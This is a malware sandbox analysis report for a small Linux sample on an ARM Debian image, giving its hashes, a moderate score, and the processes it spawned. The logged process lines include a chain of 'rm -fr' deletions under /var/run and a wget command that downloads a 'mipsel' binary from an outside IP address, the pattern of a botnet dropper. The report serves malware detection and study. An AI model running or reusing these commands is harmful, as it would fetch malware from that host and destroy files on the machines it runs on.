03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8 | Triage

Analysis

max time kernel
30632s
max time network
154s
platform
linux_armhf
resource
debian9-armhf-en-20211208
resource tags

arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
27-11-2022 09:49

Sharing

Report Analysis Logs

General

Target

03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
Size

1005B
MD5

11496369b067c3c4f8db7e61546dcf6d
SHA1

baf395ac8359c4a92e634fad39d8f0c549f02b75
SHA256

03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
SHA512

61172c41174bac18d4023e917ec097c4f901909dcdd32c5888cffa114ce12c22ac4e42c042f45e059cc65dd2721d7393633d6867a4e007c6ca7a82cbd5299fb0

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8

description	ioc	process
/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8	/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8	03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8

/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
/tmp/03f98d3f5e1a0f0add585112cc6edda952ba2f38ee346929911d5e1bc2b2b1e8
1⤵
- Writes file to tmp directory
PID:351

/bin/rm
rm -fr /var/run/mipsel rm -fr /var/run/mips rm -fr /var/run/arm rm -fr /var/run/ppc rm -fr /var/run/powerpc rm -fr /var/run/sh4 rm -fr /var/run/sh rm -fr /var/run/murda rm -fr /var/run/x86_64 rm -fr /var/run/superh
2⤵
PID:352

/usr/bin/wget
wget -c http://198.27.124.29/mipsel -P /var/run
2⤵
PID:354

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...